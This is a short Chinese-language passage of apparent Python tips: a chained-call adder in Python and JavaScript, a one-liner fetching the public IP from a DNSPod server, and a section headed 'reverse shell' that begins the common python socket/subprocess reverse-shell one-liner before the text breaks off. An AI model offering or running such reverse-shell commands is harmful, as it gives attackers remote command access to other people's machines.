Python 技巧续
函数连续调用 def add ( x ): class AddNum ( int ): def __call__ ( self , x ): return AddNum ( self . numerator + x ) return AddNum ( x ) >>> add ( 2 )( 3 )( 5 ) 10 >>> add ( 2 )( 3 )( 4 )( 5 )( 6 )( 7 ) 27 # js var add = function ( x ){ var addNum = function ( x ){ return add ( addNum + x ); }; addNum . toString = function (){ return x ; } return addNum ; } add ( 2 )( 3 )( 5 ) //10add(2)(3)(4)(5)(6)(7) //27 获取公网IP python - c "import socket; sock=socket.create_connection(('ns1.dnspod.net',6666)); print sock.recv(16); sock.close()" 反弹 shell python - c 'import socket,subprocess,os;s=socket.socket(socket